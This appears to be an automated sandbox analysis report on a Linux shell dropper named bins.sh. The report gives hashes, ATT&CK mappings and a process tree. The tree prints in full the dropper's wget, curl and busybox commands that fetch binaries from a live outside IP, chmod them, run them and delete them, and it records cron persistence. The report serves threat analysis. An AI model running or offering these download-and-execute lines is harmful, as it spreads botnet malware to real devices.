f3b37a4959c6343e3e1368fd68c6e8ef5da2e811cc7df5e5cd289399c5667878

Analysis

max time kernel
150s
max time network
152s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
24-11-2024 05:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

2eff4db1aec35dadd57ea962525f018b
SHA1

3d3b257f08b34cca400f3a527e8af3bc9bbc2770
SHA256

f3b37a4959c6343e3e1368fd68c6e8ef5da2e811cc7df5e5cd289399c5667878
SHA512

9ada41178570c692b386fcee9c50d4de9e4e3678c1c0f9ac27321bc96050a1f7bf301c57961379b0ad415b677a85b50d0d3b27ccdb98b4ed25c0676b1aa2bfec
SSDEEP

192:mdFW7YIy7q5qZq5EdIkxxs7q27FYIvJpvRRh7A/ALA94wy7jnDtmJpIaTXQ08atE:FGI/HUIE94wyBP5IE94wTLB

Score

9^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2103) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmod

pid	Process
733	chmod
741	chmod
835	chmod

Executes dropped EXE 3 IoCs

Processes:

U59jXOydvquUhHn4MKkSAbnLlVezXQJxQTgFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCMEUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9

ioc	pid	Process
/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	734	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
/tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM	742	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
/tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9	836	EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9

Renames itself 1 IoCs

Processes:

gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM

pid	Process
743	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.cr5Yob	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM

description	ioc	Process
File opened for reading	/proc/795/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/873/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/977/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/790/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/794/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/345/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/988/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/939/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/966/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/836/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/899/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/79/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/770/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/878/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/10/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/11/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/781/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/872/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/154/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/393/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/661/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/759/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/765/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/775/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/791/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/983/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/1/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/22/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/864/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/933/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/973/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/377/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/825/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/827/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/905/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/930/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/736/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/783/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/984/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/12/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/810/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/693/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/705/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/957/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/964/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/972/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/992/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/24/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/665/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/819/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/940/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/997/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/776/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/779/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/762/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/786/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/814/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/818/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/833/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/876/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/342/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/754/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/954/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
File opened for reading	/proc/1009/cmdline	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlbusyboxwgetcurlbusyboxbusyboxwget

description	ioc	Process
File opened for modification	/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	curl
File opened for modification	/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	busybox
File opened for modification	/tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM	wget
File opened for modification	/tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM	curl
File opened for modification	/tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM	busybox
File opened for modification	/tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9	busybox
File opened for modification	/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:701
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:704
- /usr/bin/wget
  wget http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Writes file to tmp directory
  PID:706
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Writes file to tmp directory
  PID:719
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Writes file to tmp directory
  PID:731
- /bin/chmod
  chmod 777 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  ./U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Executes dropped EXE
  PID:734
- /bin/rm
  rm U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  PID:737
- /usr/bin/wget
  wget http://87.120.125.191/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  - Writes file to tmp directory
  PID:738
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  - Writes file to tmp directory
  PID:739
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  - Writes file to tmp directory
  PID:740
- /bin/chmod
  chmod 777 gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  ./gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:742
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:744
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:745
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:746
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:747
- /bin/rm
  rm gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  PID:749
- /usr/bin/wget
  wget http://87.120.125.191/bins/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  PID:752
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  PID:753
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  - Writes file to tmp directory
  PID:834
- /bin/chmod
  chmod 777 EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  ./EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  - Executes dropped EXE
  PID:836
- /bin/rm
  rm EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  PID:838
- /usr/bin/wget
  wget http://87.120.125.191/bins/Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
  2⤵
  PID:839
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
  2⤵
  PID:840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9

Filesize
111KB

MD5
ca897a38f23ec23521ce0b1b83f8422d

SHA1
b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

SHA256
043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

SHA512
10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

Download Submit
/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/var/spool/cron/crontabs/tmp.cr5Yob

Filesize
210B

MD5
42bd28084e3965e4b21ddbe448438f82

SHA1
548ffb1397ed4775d2744e0960eafcf2cf9906e2

SHA256
6e0fffaa30c3b97e0c91e569cfc36060f62cfba619db09fb1d95bedf10e9a51e

SHA512
e3c3b7f214f970e51a7e15cdf1b4eb0c089812a873359c3f1f3eca5590c74534ddc85206fe02b56f9e37b5f067191df6b9e17aef930303fa4326f50d4b87de32

Download Submit